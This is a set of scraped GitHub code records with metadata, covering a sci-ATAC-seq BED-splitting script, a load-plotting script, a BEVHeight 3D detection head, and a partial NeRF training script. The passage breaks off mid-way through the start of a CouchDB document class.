/usr/bin/env python\n\n#Author: Timothy Durham (c) 2018\n\nimport argparse\nimport numpy\nimport os\nfrom plumbum import local\nimport sys\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--cell_name_to_cluster_map')\n parser.add_argument('--cuts_bed_file')\n parser.add_argument('--out_dir')\n args = parser.parse_args()\n\n #get cell names for each cluster\n cluster_map = numpy.loadtxt(args.cell_name_to_cluster_map, delimiter='\\t', dtype=object)\n for clust_num in set(cluster_map[:,1]):\n clust_out_dir = os.path.join(args.out_dir, clust_num)\n if not os.path.isdir(clust_out_dir):\n os.makedirs(clust_out_dir)\n with open(os.path.join(clust_out_dir, '{!s}.indextable.txt'.format(clust_num)), 'w') as out:\n out.write('\\n'.join(['\\t'.join(cluster_map[idx]) for idx in numpy.where(cluster_map[:,1] == clust_num)[0]]) + '\\n')\n cell_names_to_clusters = dict([tuple(cluster_map[idx]) for idx in range(cluster_map.shape[0])])\n\n# with open(args.cell_name_to_cluster_map) as map_in:\n# cell_names_to_clusters = dict([(elt.strip().split()[0], \n# elt.strip().split()[1]) for elt in map_in])\n\n #parse bam file to make per-cluster bam files\n total_cuts_bed = args.cuts_bed_file\n out_dir = args.out_dir\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n\n bed_paths = {elt:os.path.join(out_dir, elt, '{!s}.cuts.bed'.format(elt)) for elt in set(cell_names_to_clusters.values())}\n bed_files = {}\n for elt, path in bed_paths.items():\n if not os.path.isdir(os.path.dirname(path)):\n os.makedirs(os.path.dirname(path))\n bed_files[elt] = open(path, 'w')\n# bed_files = {elt:open(path, 'w') for elt,path in bed_paths.items()}\n not_assignable_path = os.path.join(out_dir, 'unassignable.cuts.bed')\n not_assignable = open(not_assignable_path, 'w')\n with open(total_cuts_bed) as lines_in:\n for idx, line in enumerate(lines_in):\n if idx and not idx % 500000:\n sys.stdout.write('Processed {!s} BED records.\\n'.format(idx))\n sys.stdout.flush()\n cell_id = line.split()[3].split(':')[0]\n try:\n bed_files[cell_names_to_clusters[cell_id]].write(line)\n except KeyError:\n not_assignable.write(line)\n sys.stdout.write('Processed {!s} BED records.\\n'.format(idx))\n sys.stdout.flush()\n not_assignable.close()\n for bed in bed_files.values(): \n bed.close()\n\n sys.stdout.write('Splitting BED file complete.\\n')\n sys.stdout.flush()\n", "repo_name": "tdurham86/L2_sci-ATAC-seq", "sub_path": "scripts/lda_clustering/split_bed_script.py", "file_name": "split_bed_script.py", "file_ext": "py", "file_size_in_byte": 2638, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, 
{"api_name": "os.makedirs", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 51, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 58, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 58, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 63, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 64, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 64, "usage_type": "attribute"}]} +{"seq_id": "40355077233", "text": "from matplotlib import pyplot as plt\n\n\ndef main():\n timestamps = []\n avgs = []\n exps = []\n loads = []\n with open('output.txt', 'rb') as f:\n lines = f.readlines()\n for line in lines:\n timestamp, avg, exp, load = line.split()\n timestamps.append(int(timestamp))\n avgs.append(float(avg))\n exps.append(float(exp))\n loads.append(float(load))\n plt.plot(timestamps, loads)\n plt.plot(timestamps, avgs)\n plt.plot(timestamps, exps)\n plt.show()\n\nif __name__ == \"__main__\":\n main()", "repo_name": "EfficientAI/efficient_cv", "sub_path": "native/all_load_tracking/plotter.py", "file_name": "plotter.py", "file_ext": "py", "file_size_in_byte": 567, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "29807345311", "text": "\"\"\"Inherited from `https://github.com/open-mmlab/mmdetection3d/blob/master/mmdet3d/models/dense_heads/centerpoint_head.py`\"\"\" # noqa\nimport torch\nfrom mmdet3d.core import draw_heatmap_gaussian, gaussian_radius\nfrom mmdet3d.models.dense_heads.centerpoint_head import CenterHead\nfrom mmdet3d.models.utils import clip_sigmoid\nfrom mmdet.core import reduce_mean\nfrom mmdet.models import 
build_backbone\nfrom mmdet3d.models import build_neck\nfrom torch.cuda.amp import autocast\n\n__all__ = ['BEVHeightHead']\n\nbev_backbone_conf = dict(\n type='ResNet',\n in_channels=80,\n depth=18,\n num_stages=3,\n strides=(1, 2, 2),\n dilations=(1, 1, 1),\n out_indices=[0, 1, 2],\n norm_eval=False,\n base_channels=160,\n)\n\nbev_neck_conf = dict(type='SECONDFPN',\n in_channels=[160, 320, 640],\n upsample_strides=[2, 4, 8],\n out_channels=[64, 64, 128])\n\n\nclass BEVHeightHead(CenterHead):\n \"\"\"Head for BevDepth.\n\n Args:\n in_channels(int): Number of channels after bev_neck.\n tasks(dict): Tasks for head.\n bbox_coder(dict): Config of bbox coder.\n common_heads(dict): Config of head for each task.\n loss_cls(dict): Config of classification loss.\n loss_bbox(dict): Config of regression loss.\n gaussian_overlap(float): Gaussian overlap used for `get_targets`.\n min_radius(int): Min radius used for `get_targets`.\n train_cfg(dict): Config used in the training process.\n test_cfg(dict): Config used in the test process.\n bev_backbone_conf(dict): Cnfig of bev_backbone.\n bev_neck_conf(dict): Cnfig of bev_neck.\n \"\"\"\n def __init__(\n self,\n in_channels=256,\n tasks=None,\n bbox_coder=None,\n common_heads=dict(),\n loss_cls=dict(type='GaussianFocalLoss', reduction='mean'),\n loss_bbox=dict(type='L1Loss', reduction='mean', loss_weight=0.25),\n gaussian_overlap=0.1,\n min_radius=2,\n train_cfg=None,\n test_cfg=None,\n bev_backbone_conf=bev_backbone_conf,\n bev_neck_conf=bev_neck_conf,\n separate_head=dict(type='SeparateHead',\n init_bias=-2.19,\n final_kernel=3),\n ):\n super(BEVHeightHead, self).__init__(\n in_channels=in_channels,\n tasks=tasks,\n bbox_coder=bbox_coder,\n common_heads=common_heads,\n loss_cls=loss_cls,\n loss_bbox=loss_bbox,\n separate_head=separate_head,\n )\n self.trunk = build_backbone(bev_backbone_conf)\n self.trunk.init_weights()\n self.neck = build_neck(bev_neck_conf)\n self.neck.init_weights()\n del self.trunk.maxpool\n self.gaussian_overlap = gaussian_overlap\n self.min_radius = min_radius\n self.train_cfg = train_cfg\n self.test_cfg = test_cfg\n\n @autocast(False)\n def forward(self, x):\n \"\"\"Forward pass.\n\n Args:\n feats (list[torch.Tensor]): Multi-level features, e.g.,\n features produced by FPN.\n\n Returns:\n tuple(list[dict]): Output results for tasks.\n \"\"\"\n # FPN\n trunk_outs = [x]\n if self.trunk.deep_stem:\n x = self.trunk.stem(x)\n else:\n x = self.trunk.conv1(x)\n x = self.trunk.norm1(x)\n x = self.trunk.relu(x)\n for i, layer_name in enumerate(self.trunk.res_layers):\n res_layer = getattr(self.trunk, layer_name)\n x = res_layer(x)\n if i in self.trunk.out_indices:\n trunk_outs.append(x)\n fpn_output = self.neck(trunk_outs)\n ret_values = super().forward(fpn_output)\n return ret_values\n\n def get_targets_single(self, gt_bboxes_3d, gt_labels_3d):\n \"\"\"Generate training targets for a single sample.\n\n Args:\n gt_bboxes_3d (:obj:`LiDARInstance3DBoxes`): Ground truth gt boxes.\n gt_labels_3d (torch.Tensor): Labels of boxes.\n\n Returns:\n tuple[list[torch.Tensor]]: Tuple of target including \\\n the following results in order.\n\n - list[torch.Tensor]: Heatmap scores.\n - list[torch.Tensor]: Ground truth boxes.\n - list[torch.Tensor]: Indexes indicating the position \\\n of the valid boxes.\n - list[torch.Tensor]: Masks indicating which boxes \\\n are valid.\n \"\"\"\n max_objs = self.train_cfg['max_objs'] * self.train_cfg['dense_reg']\n grid_size = torch.tensor(self.train_cfg['grid_size'])\n pc_range = 
torch.tensor(self.train_cfg['point_cloud_range'])\n voxel_size = torch.tensor(self.train_cfg['voxel_size'])\n\n feature_map_size = grid_size[:2] // self.train_cfg['out_size_factor']\n # reorganize the gt_dict by tasks\n task_masks = []\n flag = 0\n for class_name in self.class_names:\n task_masks.append([\n torch.where(gt_labels_3d == class_name.index(i) + flag)\n for i in class_name\n ])\n flag += len(class_name)\n\n task_boxes = []\n task_classes = []\n flag2 = 0\n for idx, mask in enumerate(task_masks):\n task_box = []\n task_class = []\n for m in mask:\n task_box.append(gt_bboxes_3d[m])\n # 0 is background for each task, so we need to add 1 here.\n task_class.append(gt_labels_3d[m] + 1 - flag2)\n task_boxes.append(\n torch.cat(task_box, axis=0).to(gt_bboxes_3d.device))\n task_classes.append(\n torch.cat(task_class).long().to(gt_bboxes_3d.device))\n flag2 += len(mask)\n draw_gaussian = draw_heatmap_gaussian\n heatmaps, anno_boxes, inds, masks = [], [], [], []\n\n for idx, task_head in enumerate(self.task_heads):\n heatmap = gt_bboxes_3d.new_zeros(\n (len(self.class_names[idx]), feature_map_size[1],\n feature_map_size[0]),\n device='cuda')\n\n anno_box = gt_bboxes_3d.new_zeros((max_objs, 10),\n dtype=torch.float32,\n device='cuda')\n\n ind = gt_labels_3d.new_zeros((max_objs),\n dtype=torch.int64,\n device='cuda')\n mask = gt_bboxes_3d.new_zeros((max_objs),\n dtype=torch.uint8,\n device='cuda')\n\n num_objs = min(task_boxes[idx].shape[0], max_objs)\n\n for k in range(num_objs):\n cls_id = task_classes[idx][k] - 1\n\n width = task_boxes[idx][k][3]\n length = task_boxes[idx][k][4]\n width = width / voxel_size[0] / self.train_cfg[\n 'out_size_factor']\n length = length / voxel_size[1] / self.train_cfg[\n 'out_size_factor']\n\n if width > 0 and length > 0:\n radius = gaussian_radius(\n (length, width),\n min_overlap=self.train_cfg['gaussian_overlap'])\n radius = max(self.train_cfg['min_radius'], int(radius))\n\n # be really careful for the coordinate system of\n # your box annotation.\n x, y, z = task_boxes[idx][k][0], task_boxes[idx][k][\n 1], task_boxes[idx][k][2]\n\n coor_x = (\n x - pc_range[0]\n ) / voxel_size[0] / self.train_cfg['out_size_factor']\n coor_y = (\n y - pc_range[1]\n ) / voxel_size[1] / self.train_cfg['out_size_factor']\n\n center = torch.tensor([coor_x, coor_y],\n dtype=torch.float32,\n device='cuda')\n center_int = center.to(torch.int32)\n\n # throw out not in range objects to avoid out of array\n # area when creating the heatmap\n if not (0 <= center_int[0] < feature_map_size[0]\n and 0 <= center_int[1] < feature_map_size[1]):\n continue\n\n draw_gaussian(heatmap[cls_id], center_int, radius)\n\n new_idx = k\n x, y = center_int[0], center_int[1]\n\n assert y * feature_map_size[0] + x < feature_map_size[\n 0] * feature_map_size[1]\n\n ind[new_idx] = y * feature_map_size[0] + x\n mask[new_idx] = 1\n # TODO: support other outdoor dataset\n vx, vy = task_boxes[idx][k][7:]\n rot = task_boxes[idx][k][6]\n box_dim = task_boxes[idx][k][3:6]\n if self.norm_bbox:\n box_dim = box_dim.log()\n anno_box[new_idx] = torch.cat([\n center - torch.tensor([x, y], device='cuda'),\n z.unsqueeze(0),\n box_dim,\n torch.sin(rot).unsqueeze(0),\n torch.cos(rot).unsqueeze(0),\n vx.unsqueeze(0),\n vy.unsqueeze(0),\n ])\n\n heatmaps.append(heatmap)\n anno_boxes.append(anno_box)\n masks.append(mask)\n inds.append(ind)\n return heatmaps, anno_boxes, inds, masks\n\n def loss(self, targets, preds_dicts, **kwargs):\n \"\"\"Loss function for BEVHeightHead.\n\n Args:\n gt_bboxes_3d 
(list[:obj:`LiDARInstance3DBoxes`]): Ground\n truth gt boxes.\n gt_labels_3d (list[torch.Tensor]): Labels of boxes.\n preds_dicts (dict): Output of forward function.\n\n Returns:\n dict[str:torch.Tensor]: Loss of heatmap and bbox of each task.\n \"\"\"\n heatmaps, anno_boxes, inds, masks = targets\n return_loss = 0\n for task_id, preds_dict in enumerate(preds_dicts):\n # heatmap focal loss\n preds_dict[0]['heatmap'] = clip_sigmoid(preds_dict[0]['heatmap'])\n num_pos = heatmaps[task_id].eq(1).float().sum().item()\n cls_avg_factor = torch.clamp(reduce_mean(\n heatmaps[task_id].new_tensor(num_pos)),\n min=1).item()\n loss_heatmap = self.loss_cls(preds_dict[0]['heatmap'],\n heatmaps[task_id],\n avg_factor=cls_avg_factor)\n target_box = anno_boxes[task_id]\n # reconstruct the anno_box from multiple reg heads\n preds_dict[0]['anno_box'] = torch.cat(\n (\n preds_dict[0]['reg'],\n preds_dict[0]['height'],\n preds_dict[0]['dim'],\n preds_dict[0]['rot'],\n preds_dict[0]['vel'],\n ),\n dim=1,\n )\n\n # Regression loss for dimension, offset, height, rotation\n num = masks[task_id].float().sum()\n ind = inds[task_id]\n pred = preds_dict[0]['anno_box'].permute(0, 2, 3, 1).contiguous()\n pred = pred.view(pred.size(0), -1, pred.size(3))\n pred = self._gather_feat(pred, ind)\n mask = masks[task_id].unsqueeze(2).expand_as(target_box).float()\n num = torch.clamp(reduce_mean(target_box.new_tensor(num)),\n min=1e-4).item()\n isnotnan = (~torch.isnan(target_box)).float()\n mask *= isnotnan\n code_weights = self.train_cfg['code_weights']\n bbox_weights = mask * mask.new_tensor(code_weights)\n loss_bbox = self.loss_bbox(pred,\n target_box,\n bbox_weights,\n avg_factor=num)\n return_loss += loss_bbox\n return_loss += loss_heatmap\n return return_loss\n", "repo_name": "ADLab-AutoDrive/BEVHeight", "sub_path": "layers/heads/bev_height_head.py", "file_name": "bev_height_head.py", "file_ext": "py", "file_size_in_byte": 12368, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 143, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mmdet3d.models.dense_heads.centerpoint_head.CenterHead", "line_number": 31, "usage_type": "name"}, {"api_name": "mmdet.models.build_backbone", "line_number": 75, "usage_type": "call"}, {"api_name": "mmdet3d.models.build_neck", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.cuda.amp.autocast", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 160, "usage_type": "call"}, {"api_name": "mmdet3d.core.draw_heatmap_gaussian", "line_number": 162, "usage_type": "name"}, {"api_name": "torch.float32", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.int64", "line_number": 176, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 179, "usage_type": "attribute"}, {"api_name": "mmdet3d.core.gaussian_radius", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 213, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 215, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 239, "usage_type": "call"}, 
{"api_name": "torch.tensor", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.sin", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.cos", "line_number": 244, "usage_type": "call"}, {"api_name": "mmdet3d.models.utils.clip_sigmoid", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 273, "usage_type": "call"}, {"api_name": "mmdet.core.reduce_mean", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 299, "usage_type": "call"}, {"api_name": "mmdet.core.reduce_mean", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 301, "usage_type": "call"}]} +{"seq_id": "70067151845", "text": "from load_llff import load_llff_data\nfrom embedding import get_embedder\nfrom model import NeRF\n\ndef batchify(fn, chunk):\n if chunk is None:\n return fn\n def ret(inputs):\n return torch.cat([fn(inputs[i:i+chunk]) for i in range(0, inputs.shape[0], chunk)], 0)\n return ret\n\n\ndef run_network(inputs, viewdirs, fn, embed_fn, embeddirs_fn, netchunk=1024*64):\n inputs_flat = torch.reshape(inputs, [-1, inputs.shape[-1]])\n\n embedded = embed_fn(inputs_flat)\n if viewdirs is not None:\n input_dirs = viewdirs[:, None].expand(inputs.shape)\n input_dirs_flat = torch.reshape(input_dirs, [-1, inputs.shape[-1]])\n embedded_dirs = embed_fn(input_dirs_flat)\n embedded = torch.cat([embedded, embedded_dirs], -1)\n \n outputs_flat = batchify(fn, netchunk)(embedded)\n outputs = torch.reshape(outputs_flat, list(input.shape[:-1]) + [outputs_flat.shape[-1]])\n\n return outputs\n\n\ndef create_nerf(args):\n embef_fn, input_ch = get_embedder(args.multires, args.i_embed) # positional encoding\n\n input_ch_views = 0\n embeddirs_fn = None\n # viewdirs\n if args.use_viewdirs:\n embeddirs_fn, input_ch_views = get_embedder(args.multires_views, args.i_embed)\n output_ch = 5 if args.N_importance > 0 else 4\n skips = [4] ### ????\n model = NeRF(D=args.netdepth, W=args.netwidth, input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs).to(device) \n grad_vars = list(model.parameters())\n\n model_fine = None\n if args.N_importance > 0:\n model_fine = NeRF(D=args.netdepth, W=args.netwidth, input_ch=input_ch, output_ch=output_ch, skips=skips,\n input_ch_views=input_ch_views, use_viewdirs=args.use_viewdirs).to(device) \n grad_vars += list(model_fine.parameters())\n\n def network_query_fn(inputs, viewdirs, network_fn): return run_network(\n inputs, viewdirs, network_fn,\n embed_fn=embed_fn,\n embeddirs_fn=embeddirs_fn,\n netchunk=args.netchunk\n )\n\n optimizer = torch.optim.Adam(params=grad_vars, lr=args.lrate, betas=(0.9, 0.999))\n\n start = 0\n basedir = args.basedir\n expname = args.expname\n ############################\n\n if args.ft_path is not None and args.ft_path != 'None':\n ckpts = [args.ft_path]\n else:\n ckpts = [os.path.join(basedir, expname, f) for f in sorted(os.listdir(os.path.join(basedir, expname))) if 'tar' in f]\n \n print('Found ckpts', ckpts)\n if len(ckpts) > 0 and not args.no_reload:\n ckpt_path = ckpts[-1]\n print('Reloading from', ckpt_path)\n ckpt = torch.load(ckpt_path)\n\n start = ckpt['global_step']\n optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n\n # load model\n model.load_state_dict(ckpt['network_fn_state_dict'])\n if model_fine is not None:\n model_fine.load_state_dict(ckpt['network_fine_state_dict'])\n #########################\n 
render_kwargs_train = {\n 'network_query_fn' : network_query_fn,\n 'perturb' : args.perturb,\n 'N_importance' : args.N_importance,\n 'network_fine' : model_fine,\n 'N_samples' : args.N_samples,\n 'network_fn' : model,\n 'use_viewdirs' : args.use_viewdirs,\n 'white_bkgd' : args.white_bkgd,\n 'raw_noise_std' : args.raw_noise_std,\n }\n\n # NDC only good for LLFF-style forward facing data !\n\n render_kwargs_test = {\n k : render_kwargs_train[k] for k in render_kwargs_train\n }\n render_kwargs_test['perturb'] = False\n render_kwargs_test['raw_noise_std'] = 0.\n\n return render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer\n\ndef config_parser():\n import configargparse\n parser = configargparse.ArgumentParser()\n parser.add_argument('--config', is_config_file=True, \n help='config file path')\n parser.add_argument(\"--expname\", type=str, \n help='experiment name')\n parser.add_argument(\"--basedir\", type=str, default='./logs/', \n help='where to store ckpts and logs')\n parser.add_argument(\"--datadir\", type=str, default='./data/llff/fern', \n help='input data directory')\n\n # training options\n parser.add_argument(\"--netdepth\", type=int, default=8, \n help='layers in network')\n parser.add_argument(\"--netwidth\", type=int, default=256, \n help='channels per layer')\n parser.add_argument(\"--netdepth_fine\", type=int, default=8, \n help='layers in fine network')\n parser.add_argument(\"--netwidth_fine\", type=int, default=256, \n help='channels per layer in fine network')\n parser.add_argument(\"--N_rand\", type=int, default=32*32*4, \n help='batch size (number of random rays per gradient step)')\n parser.add_argument(\"--lrate\", type=float, default=5e-4, \n help='learning rate')\n parser.add_argument(\"--lrate_decay\", type=int, default=250, \n help='exponential learning rate decay (in 1000 steps)')\n parser.add_argument(\"--chunk\", type=int, default=1024*32, \n help='number of rays processed in parallel, decrease if running out of memory')\n parser.add_argument(\"--netchunk\", type=int, default=1024*64, \n help='number of pts sent through network in parallel, decrease if running out of memory')\n parser.add_argument(\"--no_batching\", action='store_true', \n help='only take random rays from 1 image at a time')\n parser.add_argument(\"--no_reload\", action='store_true', \n help='do not reload weights from saved ckpt')\n parser.add_argument(\"--ft_path\", type=str, default=None, \n help='specific weights npy file to reload for coarse network')\n\n # rendering options\n parser.add_argument(\"--N_samples\", type=int, default=64, \n help='number of coarse samples per ray')\n parser.add_argument(\"--N_importance\", type=int, default=0,\n help='number of additional fine samples per ray')\n parser.add_argument(\"--perturb\", type=float, default=1.,\n help='set to 0. for no jitter, 1. 
for jitter')\n parser.add_argument(\"--use_viewdirs\", action='store_true', \n help='use full 5D input instead of 3D')\n parser.add_argument(\"--i_embed\", type=int, default=0, \n help='set 0 for default positional encoding, -1 for none')\n parser.add_argument(\"--multires\", type=int, default=10, \n help='log2 of max freq for positional encoding (3D location)')\n parser.add_argument(\"--multires_views\", type=int, default=4, \n help='log2 of max freq for positional encoding (2D direction)')\n parser.add_argument(\"--raw_noise_std\", type=float, default=0., \n help='std dev of noise added to regularize sigma_a output, 1e0 recommended')\n\n parser.add_argument(\"--render_only\", action='store_true', \n help='do not optimize, reload weights and render out render_poses path')\n parser.add_argument(\"--render_test\", action='store_true', \n help='render the test set instead of render_poses path')\n parser.add_argument(\"--render_factor\", type=int, default=0, \n help='downsampling factor to speed up rendering, set 4 or 8 for fast preview')\n\n # training options\n parser.add_argument(\"--precrop_iters\", type=int, default=0,\n help='number of steps to train on central crops')\n parser.add_argument(\"--precrop_frac\", type=float,\n default=.5, help='fraction of img taken for central crops') \n\n # dataset options\n parser.add_argument(\"--dataset_type\", type=str, default='llff', \n help='options: llff / blender / deepvoxels')\n parser.add_argument(\"--testskip\", type=int, default=8, \n help='will load 1/N images from test/val sets, useful for large datasets like deepvoxels')\n\n ## deepvoxels flags\n parser.add_argument(\"--shape\", type=str, default='greek', \n help='options : armchair / cube / greek / vase')\n\n ## blender flags\n parser.add_argument(\"--white_bkgd\", action='store_true', \n help='set to render synthetic data on a white bkgd (always use for dvoxels)')\n parser.add_argument(\"--half_res\", action='store_true', \n help='load blender synthetic data at 400x400 instead of 800x800')\n\n ## llff flags\n parser.add_argument(\"--factor\", type=int, default=8, \n help='downsample factor for LLFF images')\n parser.add_argument(\"--no_ndc\", action='store_true', \n help='do not use normalized device coordinates (set for non-forward facing scenes)')\n parser.add_argument(\"--lindisp\", action='store_true', \n help='sampling linearly in disparity rather than depth')\n parser.add_argument(\"--spherify\", action='store_true', \n help='set for spherical 360 scenes')\n parser.add_argument(\"--llffhold\", type=int, default=8, \n help='will take every 1/N images as LLFF test set, paper uses 8')\n\n # logging/saving options\n parser.add_argument(\"--i_print\", type=int, default=100, \n help='frequency of console printout and metric logging')\n parser.add_argument(\"--i_img\", type=int, default=500, \n help='frequency of tensorboard image logging')\n parser.add_argument(\"--i_weights\", type=int, default=10000, \n help='frequency of weight ckpt saving')\n parser.add_argument(\"--i_testset\", type=int, default=50000, \n help='frequency of testset saving')\n parser.add_argument(\"--i_video\", type=int, default=50000, \n help='frequency of render_poses video saving')\n\n return parser\n \ndef train():\n parser = config_parser()\n args = parser.parse_args()\n \n \"\"\"\n Load the llff dataset + settings\n \"\"\"\n images, poses, bds, render_poses, i_test = load_llff_data(args.datadir, args.factor,\n recenter=True, bd_factor=.75,\n spherify=args.spherify)\n \n print(\"IMG\", images.shape)\n print(\"POSES\", poses.shape)\n print(\"bds\", bds.shape)\n print(\"render_poses\", render_poses.shape)\n print(\"i_test\", i_test.shape)\n \n hwf = poses[0, :3, -1] # height, width, focal length\n poses = poses[:,:3,:4] # camera extrinsic matrix\n \n if not isinstance(i_test, list):\n i_test = [i_test]\n \n if args.llffhold > 0:\n print('Auto LLFF holdout,', args.llffhold)\n i_test = np.arange(images.shape[0])[::args.llffhold]\n \n i_val = i_test\n i_train = np.array([i for i in np.arange(int(images.shape[0])) if\n (i not in i_test and i not in i_val)])\n \n print('Defining Bounds')\n near = 0.\n far = 1.\n print('NEAR FAR', near, far) # the llff dataset uses NDC (normalized device coordinates), so set near -> 0 and far -> 1\n \n \"\"\"\n intrinsics\n \"\"\"\n H, W, focal = hwf\n H, W = int(H), int(W)\n hwf = [H, W, focal]\n \n K = np.array([\n [focal, 0, 0.5*W],\n [0, focal, 0.5*H],\n [0, 0, 1]\n ])\n \n \"\"\"\n Create log dir / make config file\n \"\"\"\n basedir = args.basedir # ./logs/\n expname = \"default\" # args.expname\n os.makedirs(os.path.join(basedir, expname), exist_ok=True)\n f = os.path.join(basedir, expname, 'args.txt')\n with open(f, 'w') as file:\n for arg in sorted(vars(args)):\n attr = getattr(args, arg)\n file.write('{} = {}\\n'.format(arg, attr))\n if args.config is not None:\n f = os.path.join(basedir, expname, 'config.txt')\n with open(f, 'w') as file:\n file.write(open(args.config, 'r').read())\n \n \"\"\"\n Create NeRF model\n \"\"\"\n render_kwargs_train, render_kwargs_test, start, grad_vars, optimizer = create_nerf(args)\n global_step = start\n\n bds_dict = {\n 'near': near,\n 'far': far,\n } \n \n render_kwargs_train.update(bds_dict)\n render_kwargs_test.update(bds_dict)\n\n # Move testing data to GPU\n render_poses = torch.Tensor(render_poses).to(device)\n\n # rendering out from trained model\n if args.render_only:\n print(\"RENDER ONLY\")\n with torch.no_grad():\n if args.render_test:\n # render_test switches to test poses\n images = images[i_test]\n else:\n # Default is smoother render_poses path\n images = None\n \n\nif __name__=='__main__':\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\n train()", "repo_name": "kim-minsol/paper", "sub_path": "NeRF/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13089, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "embedding.get_embedder", "line_number": 30, "usage_type": "call"}, {"api_name": "embedding.get_embedder", "line_number": 36, "usage_type": "call"}, {"api_name": "model.NeRF", "line_number": 39, "usage_type": "call"}, {"api_name": "model.parameters", "line_number": 41, "usage_type": "call"}, {"api_name": "model.NeRF", "line_number": 45, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 78, "usage_type": "call"}, {"api_name": "configargparse.ArgumentParser", "line_number": 106, "usage_type": "call"}, {"api_name": "load_llff.load_llff_data", "line_number": 222, "usage_type": "call"}]}
+{"seq_id": "13809051640", "text": "from corduroy import Document\nfrom datetime import datetime\nfrom dateutil.parser import parse as date_parse\n\nclass BaseDocument(Document):\n def __init__(self, *args, **kwargs):\n default = self.__class__.defaults\n # print value\n type_keys = default.keys()\n value = args[0] if len(args) >= 1 else None\n\n if value is None or not isinstance(value, dict):\n value = {}\n val_keys = value.keys()\n for tkey in type_keys:\n if tkey in val_keys and 
